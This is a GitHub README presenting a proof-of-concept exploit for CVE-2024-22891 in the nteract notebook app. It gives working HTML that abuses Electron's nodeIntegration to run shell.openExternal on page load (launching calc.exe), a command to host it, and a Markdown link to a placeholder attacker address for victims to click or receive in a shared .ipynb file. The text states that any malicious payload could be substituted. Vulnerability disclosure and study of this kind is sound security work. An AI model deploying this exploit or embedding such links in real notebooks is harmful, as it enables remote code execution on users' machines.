Skip to content

Latest commit

 

History

History
72 lines (61 loc) · 2.96 KB

README.md

File metadata and controls

72 lines (61 loc) · 2.96 KB
Raw

Nteract PoC

A Proof-Of-Concept for CVE-2024-22891 vulnerability.

nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution.

In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it. As a PoC there is a python file that automates the process.

1.Vunerability Overview:

  • Vulnerability Subject: Markdown link RCE
  • Vulnerability Type: Other: Open Redirect
  • Manifestation of the Issue: Electron Webview
  • Affected Component: markdown
  • Attack Type: Remote Code Execution
  • Attack Vectors: To exploit the vulnerability, someone must click on the link or access the shared project's link.
  • Reserved CVE Number: CVE-2024-22891

2. Vulnerability Cause:

  • nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution (because nodeIntegration in webPreferences is true).

  • Exploit explain

    • When generating links through MarkDown within the application, it creates a WebView via Electron, allowing external access to the link. Consequently, an attacker can achieve Remote Code Execution (RCE) by connecting to the link leading to the attacker's server.

Proof-of-concept (POC)

Step 1) Attacker make server to Source code for launching a calc.exe using openExternal() function.

<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

Note: ※ If you want to test it quickly, create a server on the attacker's PC with the following code.

$ python -m http.server 80

Step 2) Execute the nteract application on the victim's system and create a Markdown link, or share the attacker's ipynb file as an example code. Then, execute calc.exe.

[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2

3. Additional Information

When executing a .ipynb file through file sharing, be cautious as the link may not be visible.This calc.exe could have been any malicious payload local or remote which could have given the attacker entire access to the victim’s system.